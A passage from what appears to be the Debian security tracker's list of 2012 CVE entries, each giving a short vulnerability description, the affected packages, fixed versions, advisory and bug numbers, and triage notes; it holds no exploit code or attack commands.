(readfilemap.c is not used in *IX) CVE-2012-1146 (The mem_cgroup_usage_unregister_event function in mm/memcontrol.c in ...) - linux-2.6 3.2.10-1 (low) [squeeze] - linux-2.6 (Vulnerable code not present) CVE-2012-1145 (spacewalk-backend in Red Hat Network Satellite 5.4 on Red Hat ...) NOT-FOR-US: RHN Satellite CVE-2012-1144 (FreeType before 2.4.9, as used in Mozilla Firefox Mobile before 10.0.4 ...) {DSA-2428-1} - freetype 2.4.9-1 (bug #662864) CVE-2012-1143 (FreeType before 2.4.9, as used in Mozilla Firefox Mobile before 10.0.4 ...) - freetype 2.4.9-1 (unimportant; bug #662864) NOTE: Crash only CVE-2012-1142 (FreeType before 2.4.9, as used in Mozilla Firefox Mobile before 10.0.4 ...) {DSA-2428-1} - freetype 2.4.9-1 (bug #662864) CVE-2012-1141 (FreeType before 2.4.9, as used in Mozilla Firefox Mobile before 10.0.4 ...) - freetype 2.4.9-1 (unimportant; bug #662864) NOTE: Crash only CVE-2012-1140 (FreeType before 2.4.9, as used in Mozilla Firefox Mobile before 10.0.4 ...) - freetype 2.4.9-1 (unimportant; bug #662864) NOTE: Crash only CVE-2012-1139 (Array index error in FreeType before 2.4.9, as used in Mozilla Firefox ...) - freetype 2.4.9-1 (unimportant; bug #662864) NOTE: Crash only CVE-2012-1138 (FreeType before 2.4.9, as used in Mozilla Firefox Mobile before 10.0.4 ...) - freetype 2.4.9-1 (unimportant; bug #662864) NOTE: Crash only CVE-2012-1137 (FreeType before 2.4.9, as used in Mozilla Firefox Mobile before 10.0.4 ...) - freetype 2.4.9-1 (unimportant; bug #662864) NOTE: Crash only CVE-2012-1136 (FreeType before 2.4.9, as used in Mozilla Firefox Mobile before 10.0.4 ...) {DSA-2428-1} - freetype 2.4.9-1 (bug #662864) CVE-2012-1135 (FreeType before 2.4.9, as used in Mozilla Firefox Mobile before 10.0.4 ...) - freetype 2.4.9-1 (unimportant; bug #662864) NOTE: Crash only CVE-2012-1134 (FreeType before 2.4.9, as used in Mozilla Firefox Mobile before 10.0.4 ...) {DSA-2428-1} - freetype 2.4.9-1 (bug #662864) CVE-2012-1133 (FreeType before 2.4.9, as used in Mozilla Firefox Mobile before 10.0.4 ...) {DSA-2428-1} - freetype 2.4.9-1 (bug #662864) CVE-2012-1132 (FreeType before 2.4.9, as used in Mozilla Firefox Mobile before 10.0.4 ...) - freetype 2.4.9-1 (unimportant; bug #662864) NOTE: Crash only CVE-2012-1131 (FreeType before 2.4.9, as used in Mozilla Firefox Mobile before 10.0.4 ...) - freetype 2.4.9-1 (unimportant; bug #662864) NOTE: Crash only CVE-2012-1130 (FreeType before 2.4.9, as used in Mozilla Firefox Mobile before 10.0.4 ...) - freetype 2.4.9-1 (unimportant; bug #662864) NOTE: Crash only CVE-2012-1129 (FreeType before 2.4.9, as used in Mozilla Firefox Mobile before 10.0.4 ...) - freetype 2.4.9-1 (unimportant; bug #662864) NOTE: Crash only CVE-2012-1128 (FreeType before 2.4.9, as used in Mozilla Firefox Mobile before 10.0.4 ...) - freetype 2.4.9-1 (unimportant; bug #662864) NOTE: Crash only CVE-2012-1127 (FreeType before 2.4.9, as used in Mozilla Firefox Mobile before 10.0.4 ...) - freetype 2.4.9-1 (unimportant; bug #662864) NOTE: Crash only CVE-2012-1126 (FreeType before 2.4.9, as used in Mozilla Firefox Mobile before 10.0.4 ...) - freetype 2.4.9-1 (unimportant; bug #662864) NOTE: Crash only CVE-2012-1125 (Unrestricted file upload vulnerability in ...) NOT-FOR-US: Kish Guest Posting Plugin for WordPress (not in Debian) CVE-2012-1124 RESERVED NOT-FOR-US: phxEventManager not in Debian CVE-2012-1123 (The mci_check_login function in api/soap/mc_api.php in the SOAP API in ...) {DSA-2500-1} - mantis 1.2.10-1 (bug #662858) CVE-2012-1122 (bug_actiongroup.php in MantisBT before 1.2.9 does not properly check ...) {DSA-2500-1} - mantis 1.2.10-1 (low; bug #669927) CVE-2012-1121 (MantisBT before 1.2.9 does not properly check permissions, which ...) - mantis 1.2.10-1 (low; bug #669926) [squeeze] - mantis (according to maintainer) CVE-2012-1120 (The SOAP API in MantisBT before 1.2.9 does not properly enforce the ...) {DSA-2500-1} - mantis 1.2.10-1 (low; bug #669925) CVE-2012-1119 (MantisBT before 1.2.9 does not audit when users copy or clone a bug ...) {DSA-2500-1} - mantis 1.2.10-1 (low; bug #669928) CVE-2012-1118 (The access_has_bug_level function in core/access_api.php in MantisBT ...) {DSA-2500-1} - mantis 1.2.10-1 (low; bug #669924) CVE-2012-1117 (Cross-site scripting (XSS) vulnerability in Joomla! 2.5.0 and 2.5.1 ...) - joomla (bug #571794) CVE-2012-1116 (SQL injection vulnerability in Joomla! 1.7.x and 2.5.x before 2.5.2 ...) - joomla (bug #571794) CVE-2012-1115 RESERVED - phpldapadmin 1.2.2-3 (low; bug #662050) - ldap-account-manager 3.6-2 (low; bug #661904) [squeeze] - ldap-account-manager (Minor issue) CVE-2012-1114 RESERVED - phpldapadmin 1.2.2-3 (low; bug #662050) - ldap-account-manager 3.6-2 (low; bug #661904) [squeeze] - ldap-account-manager (Minor issue) CVE-2012-1113 (Multiple cross-site scripting (XSS) vulnerabilities in the ...) - gallery2 2.3.2.dfsg-1 (low) [squeeze] - gallery2 (Minor issue) CVE-2012-1112 (Directory traversal vulnerability in Open-Realty CMS 2.5.8 and earlier ...) NOT-FOR-US: OpenRealty CMS not in Debian CVE-2012-1111 RESERVED - lightdm 1.0.9-1 (bug #658678) CVE-2012-1110 (Multiple cross-site scripting (XSS) vulnerabilities in Etano 1.22 and ...) NOT-FOR-US: etano not in Debian CVE-2012-1109 RESERVED NOT-FOR-US: mwlib not in Debian CVE-2012-1108 (The parse function in ogg/xiphcomment.cpp in TagLib 1.7 and earlier ...) - taglib 1.7.1-1 (low; bug #662705) [squeeze] - taglib (Minor issue) CVE-2012-1107 (The analyzeCurrent function in ape/apeproperties.cpp in TagLib 1.7 and ...) - taglib 1.7.1-1 (low; bug #662705) [squeeze] - taglib (Minor issue) CVE-2012-1106 (The C handler plug-in in Automatic Bug Reporting Tool (ABRT), possibly ...) NOT-FOR-US: abrt is Red Hat / Fedora specific CVE-2012-1105 RESERVED - moodle (bug #662945) - glpi 0.80.7-2 (unimportant; bug #662944) NOTE: Only supported behind an authenticated HTTP zone CVE-2012-1104 RESERVED - moodle (bug #662945) - glpi 0.80.7-2 (unimportant; bug #662944) NOTE: Only supported behind an authenticated HTTP zone CVE-2012-1103 (emacs/notmuch-mua.el in Notmuch before 0.11.1, when using the Emacs ...) {DSA-2416-1} - notmuch 0.11.1-1 CVE-2012-1101 RESERVED - systemd 43-1 (bug #662029) CVE-2012-1100 RESERVED NOT-FOR-US: JBoss Operations Network CVE-2012-1099 (Cross-site scripting (XSS) vulnerability in ...) {DSA-2466-1} - ruby-actionpack-2.3 2.3.14-3 (bug #668607) - rails 2.3.14 NOTE: (code lives within ruby-actionpack in unstable) CVE-2012-1098 (Cross-site scripting (XSS) vulnerability in Ruby on Rails 3.0.x before ...) - ruby-actionpack-2.3 2.3.14-3 (bug #668977) - rails 2.3.14 [squeeze] - rails (Vulnerable code not present) NOTE: (code lives within ruby-actionpack in unstable) CVE-2012-1097 (The regset (aka register set) feature in the Linux kernel before ...) {DSA-2443-1} - linux-2.6 3.2.10-1 (low) CVE-2012-1096 RESERVED - network-manager (low; bug #684259) [wheezy] - network-manager (Minor issue) [squeeze] - network-manager (Minor issue) CVE-2012-1095 RESERVED - osc (unimportant) NOTE: This is ultimately a bug in the respectice terminal emulations and not a vulnerability in osc CVE-2012-1094 RESERVED NOT-FOR-US: mod_cluster CVE-2012-1093 [init script x11-common creates directories in insecure manner] RESERVED - xorg 1:7.6+12 (bug #661627) [squeeze] - xorg (maintainer suggests no-dsa; confirm) CVE-2012-1092 REJECTED CVE-2012-1091 REJECTED CVE-2012-1090 (The cifs_lookup function in fs/cifs/dir.c in the Linux kernel before ...) {DSA-2443-1} - linux-2.6 3.2.10-1 CVE-2012-1089 (Directory traversal vulnerability in Apache Wicket 1.4.x before 1.4.20 ...) NOT-FOR-US: Apache Wicket CVE-2012-1088 RESERVED - iproute 20120319-1 (unimportant) NOTE: 1st issue only exploitable at build time / 2nd issue just example script in iproute-doc CVE-2012-1087 (Cross-site scripting (XSS) vulnerability in the Post data records to ...) NOT-FOR-US: bc_post2facebook extension for TYPO3 CVE-2012-1086 (Cross-site scripting (XSS) vulnerability in the UrlTool (aeurltool) ...) NOT-FOR-US: aeurltool extension for TYPO3 CVE-2012-1085 (Unspecified vulnerability in the BE User Switch (beuserswitch) ...) NOT-FOR-US: beuserswitch for TYPO3 CVE-2012-1084 (Cross-site scripting (XSS) vulnerability in the BE User Switch ...) NOT-FOR-US: beuserswitch for TYPO3 CVE-2012-1083 (Cross-site request forgery (CSRF) vulnerability in the Terminal PHP ...) NOT-FOR-US: terminal extension TYPO3 CVE-2012-1082 (Cross-site scripting (XSS) vulnerability in the Terminal PHP Shell ...) NOT-FOR-US: terminal extension TYPO3 CVE-2012-1081 (Cross-site scripting (XSS) vulnerability in the Yet another Google ...) NOT-FOR-US: ya_googlesearch extension for TYPO3 CVE-2012-1080 (Cross-site scripting (XSS) vulnerability in the Euro Calculator ...) NOT-FOR-US: skt_eurocalc extension for TYPO3 CVE-2012-1079 (Unspecified vulnerability in the Webservices for TYPO3 ...) NOT-FOR-US: typo3_webservice extension for TYPO3 CVE-2012-1078 (The System Utilities (sysutils) extension 1.0.3 and earlier for TYPO3 ...) NOT-FOR-US: sysutils extension for TYPO3 CVE-2012-1077 (SQL injection vulnerability in the Post data records to facebook ...) NOT-FOR-US: bc_post2facebook extension for TYPO3 CVE-2012-1076 (Cross-site scripting (XSS) vulnerability in the Documents download ...) NOT-FOR-US: rtg_files extension for TYPO3 CVE-2012-1075 (SQL injection vulnerability in the Documents download (rtg_files) ...) NOT-FOR-US: rtg_files extension for TYPO3 CVE-2012-1074 (SQL injection vulnerability in the White Papers (mm_whtppr) extension ...) NOT-FOR-US: mm_whtppr extension for TYPO3 CVE-2012-1073 (Cross-site scripting (XSS) vulnerability in the Category-System ...) NOT-FOR-US: toi_category extension for TYPO3 CVE-2012-1072 (SQL injection vulnerability in the Category-System (toi_category) ...) NOT-FOR-US: toi_category extension for TYPO3 CVE-2012-1071 (SQL injection vulnerability in the Kitchen recipe (mv_cooking) ...) NOT-FOR-US: mv_cooking extension for TYPO3 CVE-2012-1070 (Cross-site scripting (XSS) vulnerability in the Modern FAQ (irfaq) ...) NOT-FOR-US: irfaq extension for TYPO3 CVE-2012-1069 (Cross-site scripting (XSS) vulnerability in module/kb/search_word in ...) NOT-FOR-US: lknSupport CVE-2012-1068 (Cross-site scripting (XSS) vulnerability in the rc_ajax function in ...) NOT-FOR-US: WP-RecentComments plugin for WordPress CVE-2012-1067 (SQL injection vulnerability in the WP-RecentComments plugin 2.0.7 for ...) NOT-FOR-US: WP-RecentComments plugin for WordPress CVE-2012-1066 (Cross-site scripting (XSS) vulnerability in the template module in ...) NOT-FOR-US: SmartyCMS CVE-2012-1065 (Insecure method vulnerability in TuxScripting.dll in the TuxSystem ...) NOT-FOR-US: TuxSystem CVE-2012-1064 (Multiple cross-site scripting (XSS) vulnerabilities in EMC RSA Archer ...) NOT-FOR-US: EMC RSA Archer CVE-2011-5080 (Cross-site scripting (XSS) vulnerability in ...) NOT-FOR-US: jftcaforms extension for TYPO3 CVE-2011-5079 (Open redirect vulnerability in the Modern FAQ (irfaq) extension 1.1.2 ...) NOT-FOR-US: irfaq extension for TYPO3 CVE-2010-5085 (Multiple cross-site request forgery (CSRF) vulnerabilities in ...) NOT-FOR-US: Hulihan Amethyst CVE-2010-5084 (The cross-site request forgery (CSRF) protection mechanism in e107 ...) NOT-FOR-US: e107 CVE-2010-5083 (SQL injection vulnerability in the Web_Links module for PHP-Nuke 8.0 ...) NOT-FOR-US: PHP-Nuke CVE-2012-1063 (Multiple SQL injection vulnerabilities in ManageEngine Applications ...) NOT-FOR-US: ManageEngine Applications Manager CVE-2012-1062 (Multiple cross-site scripting (XSS) vulnerabilities in ManageEngine ...) NOT-FOR-US: ManageEngine Applications Manager CVE-2012-1061 (SQL injection vulnerability in GForge Advanced Server 6.0.0 and other ...) NOT-FOR-US: GForge Advanced Server CVE-2012-1060 (Multiple cross-site scripting (XSS) vulnerabilities in ...) NOT-FOR-US: Taxonomy module for Drupal CVE-2012-1059 (Cross-site scripting (XSS) vulnerability in ...) NOT-FOR-US: shirt module in OSCommerce CVE-2012-1058 (Cross-site request forgery (CSRF) vulnerability in Flyspray 0.9.9.6 ...) NOT-FOR-US: Flyspray CVE-2012-1057 (Cross-site request forgery (CSRF) vulnerability in the clickthrough ...) NOT-FOR-US: Forward module for Drupal CVE-2012-1056 (The Forward module 6.x-1.x before 6.x-1.21 and 7.x-1.x before 7.x-1.3 ...) NOT-FOR-US: Forward module for Drupal CVE-2012-1055 (Heap-based buffer overflow in PhotoLine 17.01 and possibly other ...) NOT-FOR-US: PhotoLine CVE-2012-1054 (Puppet 2.6.x before 2.6.14 and 2.7.x before 2.7.11, and Puppet ...) {DSA-2419-1} - puppet 2.7.11-1 CVE-2012-1053 (The change_user method in the SUIDManager ...) {DSA-2419-1} - puppet 2.7.11-1 CVE-2012-1052 (Buffer overflow in IvanView 1.2.15 allows remote attackers to execute ...) NOT-FOR-US: IvanView CVE-2012-1051 (Heap-based buffer overflow in Xjp2.dll in the JPEG2000 plug-in in ...) NOT-FOR-US: XnView CVE-2012-1050 (Directory traversal vulnerability in Mathopd 1.4.x and 1.5.x before ...) - mathopd (low; bug #660627) [lenny] - mathopd (Minor issue, configuration specific) [squeeze] - mathopd (Minor issue, configuration specific) NOTE: this is only an issue in specific configurations but not in the Debian configuration CVE-2012-1049 (Multiple cross-site scripting (XSS) vulnerabilities in ManageEngine ...) NOT-FOR-US: ManageEngine ADManager Plus CVE-2012-1048 (Cross-site scripting (XSS) vulnerability in ...) NOT-FOR-US: eFront Community++ CVE-2012-1047 (Directory traversal vulnerability in the WWWHELP Service ...) NOT-FOR-US: Cyberoam Central Console CVE-2012-1046 (Cross-site scripting (XSS) vulnerability in TM1 Web in IBM Cognos TM1 ...) NOT-FOR-US: IBM Cognos CVE-2012-1045 RESERVED CVE-2012-1044 RESERVED CVE-2012-1043 RESERVED CVE-2012-1042 RESERVED CVE-2012-1041 RESERVED CVE-2012-1040 RESERVED CVE-2012-1039 (Multiple cross-site scripting (XSS) vulnerabilities in Dotclear before ...) - dotclear 2.4.2+dfsg-1 CVE-2012-1038 (Cross-site scripting (XSS) vulnerability in the WebAAA login ...) NOT-FOR-US: Juniper CVE-2012-1037 (PHP remote file inclusion vulnerability in front/popup.php in GLPI ...) - glpi 0.80.7-1 (bug #659383; unimportant) [squeeze] - glpi (Introduced in 0.78) NOTE: Only supported behind an authenticated HTTP zone CVE-2012-1036 (Cross-site scripting (XSS) vulnerability in the telerik HTML editor in ...) NOT-FOR-US: telerik CVE-2012-1035 (AdaCore Ada Web Services (AWS) before 2.10.2 computes hash values for ...) NOT-FOR-US: AdaCore Ada Web Services CVE-2011-5078 (The web administration interface in the server in Sybase M-Business ...) NOT-FOR-US: Sybase CVE-2012-1034 (Multiple cross-site scripting (XSS) vulnerabilities in the admin ...) NOT-FOR-US: EPiServer CMS CVE-2012-1033 (The resolver in ISC BIND 9 through 9.8.1-P1 overwrites cached server ...) - bind9 1:9.8.1.dfsg.P1-4.1 (low) [squeeze] - bind9 (low-severity dns protocol design flaw) CVE-2012-1032 RESERVED CVE-2012-1031 (Unspecified vulnerability in EPiServer CMS 5 and 6 through 6R2, in ...) NOT-FOR-US: EPiServer CMS CVE-2012-1030 (Cross-site scripting (XSS) vulnerability in DotNetNuke 6.x through ...) NOT-FOR-US: DotNetNuke CVE-2012-1029 (SQL injection vulnerability in mobile/search/index.php in Tube Ace ...) NOT-FOR-US: Tube Ace CVE-2012-1028 (Cross-site scripting (XSS) vulnerability in bin/index.php in ...) NOT-FOR-US: SimpleGroupWare CVE-2012-1027 (Cross-site scripting (XSS) vulnerability in account-closed.tcl in ...) NOT-FOR-US: project-open CVE-2012-1026 (Multiple SQL injection vulnerabilities in login2.php in XRay CMS 1.1.1 ...) NOT-FOR-US: XRay CMS CVE-2012-1025 (Absolute path traversal vulnerability in file in Enigma2 Webinterface ...) NOT-FOR-US: Enigma2 CVE-2012-1024 (Directory traversal vulnerability in file in Enigma2 Webinterface ...) NOT-FOR-US: Enigma2 CVE-2012-1023 (Open redirect vulnerability in admin/index.php in 4images 1.7.10 ...) NOT-FOR-US: 4images CVE-2012-1022 (SQL injection vulnerability in admin/categories.php in 4images 1.7.10 ...) NOT-FOR-US: 4images CVE-2012-1021 (Cross-site scripting (XSS) vulnerability in admin/categories.php in ...) NOT-FOR-US: 4images CVE-2012-1020 (Multiple cross-site scripting (XSS) vulnerabilities in login.php in ...) NOT-FOR-US: NexorONE Online Banking CVE-2012-1019 (Multiple cross-site scripting (XSS) vulnerabilities in XWiki ...) NOT-FOR-US: Xwiki Enterprise CVE-2012-1018 (Cross-site scripting (XSS) vulnerability in includes/convert.php in ...) NOT-FOR-US: Joomla addon CVE-2012-1017 (Multiple SQL injection vulnerabilities in base_qry_main.php in Basic ...) - acidbase (low; bug #659287) [squeeze] - acidbase (Minor issue) CVE-2012-1016 (The pkinit_server_return_padata function in ...) - krb5 1.10.1+dfsg-4+nmu1 (bug #702633) [squeeze] - krb5 (introduced upstream with 3725d22140c23a376dd79b69d130be8e2b91005f, not affecting 1.8.x) CVE-2012-1015 (The kdc_handle_protected_negotiation function in the Key Distribution ...) {DSA-2518-1} - krb5 1.10.1+dfsg-2 (bug #683429) NOTE: http://seclists.org/bugtraq/2012/Jul/171 CVE-2012-1014 (The process_as_req function in the Key Distribution Center (KDC) in ...) {DSA-2518-1} - krb5 1.10.1+dfsg-2 (bug #683429) NOTE: http://seclists.org/bugtraq/2012/Jul/171 CVE-2012-1013 (The check_1_6_dummy function in lib/kadm5/srv/svr_principal.c in ...) - krb5 1.10.1+dfsg-3 (low; bug #687647) [squeeze] - krb5 (Minor issue) NOTE: DoS only triggered by clients with admin permissions CVE-2012-1012 (server/server_stubs.c in the kadmin protocol implementation in MIT ...) - krb5 1.10.1+dfsg-1 (bug #670918) [squeeze] - krb5 (vulnerable code not present) NOTE: bug was introduced in krb5 1.10 CVE-2012-1011 (actions.php in the AllWebMenus plugin 1.1.8 for WordPress allows ...) NOT-FOR-US: Wordpress plugin CVE-2012-1010 (Unrestricted file upload vulnerability in actions.php in the ...) NOT-FOR-US: Wordpress plugin CVE-2011-5077 (Unrestricted file upload vulnerability in attachement.php in HDWiki ...) NOT-FOR-US: HDWiki CVE-2011-5076 (SQL injection vulnerability in model/comment.class.php in HDWiki 5.0, ...) NOT-FOR-US: HDWiki CVE-2012-1009 (NetSarang Xlpd 4 Build 0100 and NetSarang Xmanager Enterprise 4 Build ...) NOT-FOR-US: NetSarang CVE-2012-1008 (OfficeSIP Server 3.1 allows remote attackers to cause a denial of ...) NOT-FOR-US: OfficeSIP Server CVE-2012-1007 (Multiple cross-site scripting (XSS) vulnerabilities in Apache Struts ...) - libstruts1.2-java (unimportant; bug #657870) NOTE: Just examples CVE-2012-1006 (Multiple cross-site scripting (XSS) vulnerabilities in Apache Struts ...) - libstruts1.2-java (Only affects Struts 2) CVE-2012-1005 (Multiple cross-site scripting (XSS) vulnerabilities in Sphinx Software ...) NOT-FOR-US: Sphinx Software Mobile Web Server CVE-2012-1004 (Multiple cross-site scripting (XSS) vulnerabilities in UI/Register.pm ...) - foswiki (bug #509864) CVE-2012-1003 (Multiple integer overflows in Opera 11.60 and earlier allow remote ...) NOT-FOR-US: Opera CVE-2002-2483 - linux-2.6 2.4.20 CVE-2012-1002 (Unspecified vulnerability in OpenConf 4.x before 4.12 has unknown ...) NOT-FOR-US: OpenConf CVE-2012-1001 RESERVED CVE-2012-1000 (Multiple cross-site scripting (XSS) vulnerabilities in LEPTON 1.1.3 ...) NOT-FOR-US: LEPTON CVE-2012-0999 (SQL injection vulnerability in modules/news/rss.php in LEPTON before ...) NOT-FOR-US: LEPTON CVE-2012-0998 (Directory traversal vulnerability in account/preferences.php in LEPTON ...) NOT-FOR-US: LEPTON CVE-2012-0997 (Cross-site request forgery (CSRF) vulnerability in admin/index.php in ...) NOT-FOR-US: 11in1 CVE-2012-0996 (Multiple directory traversal vulnerabilities in 11in1 1.2.1 stable ...) NOT-FOR-US: 11in1 CVE-2012-0995 (Multiple cross-site scripting (XSS) vulnerabilities in ZENphoto 1.4.2 ...) NOT-FOR-US: ZENphoto CVE-2012-0994 (SQL injection vulnerability in the Manage Albums feature in ...) NOT-FOR-US: ZENphoto CVE-2012-0993 (Eval injection vulnerability in ...) NOT-FOR-US: ZENphoto CVE-2012-0992 (interface/fax/fax_dispatch.php in OpenEMR 4.1.0 allows remote ...) NOT-FOR-US: OpenEMR CVE-2012-0991 (Multiple directory traversal vulnerabilities in OpenEMR 4.1.0 allow ...) NOT-FOR-US: OpenEMR CVE-2012-0990 (Cross-site request forgery (CSRF) vulnerability in ...) NOT-FOR-US: DClassifieds CVE-2012-0989 (Cross-site scripting (XSS) vulnerability in OneOrZero AIMS 2.8.0 Trial ...) NOT-FOR-US: OneOrZero AIMS CVE-2012-0988 (Multiple cross-site scripting (XSS) vulnerabilities in ...) NOT-FOR-US: KnowledgeTree CVE-2012-0987 (Directory traversal vulnerability in edituser.php in ImpressCMS 1.2.x ...) NOT-FOR-US: ImpressCMS CVE-2012-0986 (Multiple cross-site scripting (XSS) vulnerabilities in ImpressCMS ...) NOT-FOR-US: ImpressCMS CVE-2012-0985 (Multiple buffer overflows in the Wireless Manager ActiveX control ...) NOT-FOR-US: Sony VAIO wireless LAN management ActiveX CVE-2012-0984 RESERVED CVE-2012-0983 (SQL injection vulnerability in Scriptsez.net Ez Album allows remote ...) NOT-FOR-US: Ez Album CVE-2012-0982 (SQL injection vulnerability in search.php in Vastal I-Tech Agent Zone ...) NOT-FOR-US: Vastal I-Tech Agent Zone CVE-2012-0981 (Directory traversal vulnerability in phpShowtime 2.0 allows remote ...) NOT-FOR-US: phpShowtime CVE-2012-0980 (SQL injection vulnerability in download.php in phux Download Manager ...) NOT-FOR-US: phux.org Download Manager CVE-2012-0979 (Cross-site scripting (XSS) vulnerability in TWiki allows remote ...) - twiki CVE-2012-0978 (Stack-based buffer overflow in npjp2.dll in LuraWave JP2 Browser ...) NOT-FOR-US: LuraWave JP2 Browser Plug-In CVE-2012-0977 (Stack-based buffer overflow in jp2_x.dll in LuraWave JP2 ActiveX ...) NOT-FOR-US: LuraWave JP2 ActiveX Control CVE-2012-0976 (Cross-site scripting (XSS) vulnerability in admin/EditForm in ...) - silverstripe (bug #528461) CVE-2012-0975 (Cross-site scripting (XSS) vulnerability in misc.php in Image Hosting ...) NOT-FOR-US: Image Hosting Script DPI CVE-2012-0974 (Multiple cross-site scripting (XSS) vulnerabilities in the getParam ...) NOT-FOR-US: OSClass CVE-2012-0973 (Multiple SQL injection vulnerabilities in OSClass before 2.3.5 allow ...) NOT-FOR-US: OSClass CVE-2012-0972 RESERVED CVE-2012-0971 RESERVED CVE-2012-0970 RESERVED CVE-2012-0969 RESERVED CVE-2012-0968 RESERVED CVE-2012-0967 RESERVED CVE-2012-0966 RESERVED CVE-2012-0965 RESERVED CVE-2012-0964 RESERVED CVE-2012-0963 RESERVED CVE-2012-0962 (Aptdaemon 0.43 in Ubuntu 11.10 and 12.04 LTS uses short IDs when ...) - aptdaemon 0.45-2 (low) [squeeze] - aptdaemon (Vulnerable code not present) NOTE: https://bugs.launchpad.net/software-center-agent/+bug/1052789 CVE-2012-0961 (Apt 0.8.16~exp5ubuntu13.x before 0.8.16~exp5ubuntu13.6, ...) - apt 0.9.7.7 (bug #695832) [squeeze] - apt (Logged as 0600 in Squeeze) CVE-2012-0960 (Unity integration extension (unity-firefox-extension) before 2.4.1 for ...) NOT-FOR-US: Ubuntu Unity extension CVE-2012-0959 (Remote Login Service (RLS) 1.0.0 does not properly clear account ...) NOT-FOR-US: Ubuntu remote login service CVE-2012-0958 (content/unity-api.js in the unity-firefox-extension extension 2.4.1 ...) NOT-FOR-US: Firefox unity-firefox extension CVE-2012-0957 (The override_release function in kernel/sys.c in the Linux kernel ...) - linux 3.2.32-1 - linux-2.6 [squeeze] - linux-2.6 (Introduced in 3.0) NOTE: https://lkml.org/lkml/2012/10/9/550 CVE-2012-0956 (ubiquity-slideshow-ubuntu before 58.2, during installation, allows ...) NOT-FOR-US: ubiquity-slideshow-ubuntu CVE-2012-0955 RESERVED CVE-2012-0954 (APT 0.7.x before 0.7.25 and 0.8.x before 0.8.16, when using the ...) - apt (unimportant) NOTE: net-update is not enabled by default in Debian CVE-2012-0953 RESERVED CVE-2012-0952 RESERVED CVE-2012-0951 RESERVED CVE-2012-0950 (The Apport hook (DistUpgradeApport.py) in Update Manager, as used by ...) - update-manager (Ubuntu-specific) CVE-2012-0949 (The Apport hook in Update Manager as used by Ubuntu 12.04 LTS, 11.10, ...) - update-manager (Ubuntu-specific) CVE-2012-0948 (DistUpgrade/DistUpgradeMain.py in Update Manager, as used by Ubuntu ...) - update-manager (Ubuntu-specific) CVE-2012-0947 (Heap-based buffer overflow in the vqa_decode_chunk function in the VQA ...) {DSA-2471-1} - libav 6:0.8.2-1 - ffmpeg NOTE: https://bugs.launchpad.net/ubuntu/+source/libav/+bug/980963 NOTE: http://www.openwall.com/lists/oss-security/2012/05/03/4 CVE-2012-0946 (The NVIDIA UNIX driver before 295.40 allows local users to access ...) - nvidia-graphics-drivers 295.40-1 [squeeze] - nvidia-graphics-drivers 195.36.31-6squeeze1 CVE-2012-0945 RESERVED CVE-2012-0944 (Aptdaemon 0.43 and earlier in Ubuntu 11.04, 11.10, and 12.04 LTS does ...) - aptdaemon 0.43+bzr790-1 [squeeze] - aptdaemon (Vulnerable code not present) CVE-2012-0943 RESERVED - lightdm (Ubuntu-specific script) CVE-2012-0942 (Buffer overflow in rn5auth.dll in RealNetworks Helix Server and Helix ...) NOT-FOR-US: RealNetworks Helix CVE-2012-0941 RESERVED CVE-2012-0940 RESERVED CVE-2012-0939 RESERVED CVE-2012-0938 RESERVED CVE-2012-0937 (** DISPUTED ** wp-admin/setup-config.php in the installation component ...) - wordpress (unimportant) CVE-2012-0936 (Cross-site scripting (XSS) vulnerability in ...) - opennms (bug #450615) CVE-2012-0935 (SQL injection vulnerability in Default.aspx in Aryadad CMS allows ...) NOT-FOR-US: Aryadad CMS CVE-2012-0934 (PHP remote file inclusion vulnerability in ajax/savetag.php in the ...) NOT-FOR-US: Wordpress plug-in CVE-2012-0933 (Multiple cross-site scripting (XSS) vulnerabilities in Acidcat CMS ...) NOT-FOR-US: Acidcat CMS CVE-2012-0932 (Cross-site scripting (XSS) vulnerability in admin/login.php in Lead ...) NOT-FOR-US: Lead Capture Page System CVE-2012-0931 (Schneider Electric Modicon Quantum PLC does not perform authentication ...) NOT-FOR-US: Schneider Electric Modicon Quantum PLC CVE-2012-0930 (Cross-site scripting (XSS) vulnerability in Schneider Electric Modicon ...) NOT-FOR-US: Schneider Electric Modicon Quantum PLC CVE-2012-0929 (Multiple buffer overflows in Schneider Electric Modicon Quantum PLC ...) NOT-FOR-US: Schneider Electric Modicon Quantum PLC CVE-2012-0928 (The ATRAC codec in RealNetworks RealPlayer 11.x and 14.x through ...) NOT-FOR-US: RealPlayer CVE-2012-0927 (Unspecified vulnerability in RealNetworks RealPlayer 11.x, 14.x, and ...) NOT-FOR-US: RealPlayer CVE-2012-0926 (The RV10 codec in RealNetworks RealPlayer 11.x, 14.x, and 15.x before ...) NOT-FOR-US: RealPlayer CVE-2012-0925 (Unspecified vulnerability in the RV40 codec in RealNetworks RealPlayer ...) NOT-FOR-US: RealPlayer CVE-2012-0924 (RealNetworks RealPlayer 11.x, 14.x, and 15.x before 15.02.71, and ...) NOT-FOR-US: RealPlayer CVE-2012-0923 (The RV20 codec in RealNetworks RealPlayer 11.x, 14.x, and 15.x before ...) NOT-FOR-US: RealPlayer CVE-2012-0922 (rvrender.dll in RealNetworks RealPlayer 11.x, 14.x, and 15.x before ...) NOT-FOR-US: RealPlayer CVE-2011-5075 (translate.php in Support Incident Tracker (aka SiT!) 3.45 through 3.65 ...) NOT-FOR-US: Support Incident Tracker CVE-2011-5074 (Multiple cross-site request forgery (CSRF) vulnerabilities in Support ...) NOT-FOR-US: Support Incident Tracker CVE-2011-5073 (Multiple cross-site scripting (XSS) vulnerabilities in Support ...) NOT-FOR-US: Support Incident Tracker CVE-2011-5072 (Multiple SQL injection vulnerabilities in Support Incident Tracker ...) NOT-FOR-US: Support Incident Tracker CVE-2011-5071 (Multiple SQL injection vulnerabilities in Support Incident Tracker ...) NOT-FOR-US: Support Incident Tracker CVE-2011-5070 (Multiple cross-site scripting (XSS) vulnerabilities in Support ...) NOT-FOR-US: Support Incident Tracker CVE-2011-5069 (Unrestricted file upload vulnerability in incident_attachments.php in ...) NOT-FOR-US: Support Incident Tracker CVE-2011-5068 (Multiple cross-site request forgery (CSRF) vulnerabilities in Support ...) NOT-FOR-US: Support Incident Tracker CVE-2011-5067 (move_uploaded_file.php in Support Incident Tracker (aka SiT!) 3.65 ...) NOT-FOR-US: Support Incident Tracker CVE-2012-0921 RESERVED CVE-2012-0920 (Use-after-free vulnerability in Dropbear SSH Server 0.52 through ...) {DSA-2456-1} - dropbear 2012.55-1 (low; bug #661150) NOTE: this is limited to authenticated users with enforced command restrictions CVE-2012-0919 (Cross-site scripting (XSS) vulnerability in Hitachi IT Operations ...) NOT-FOR-US: Hitachi IT Operations Director CVE-2012-0918 (Unspecified vulnerability in Hitachi COBOL2002 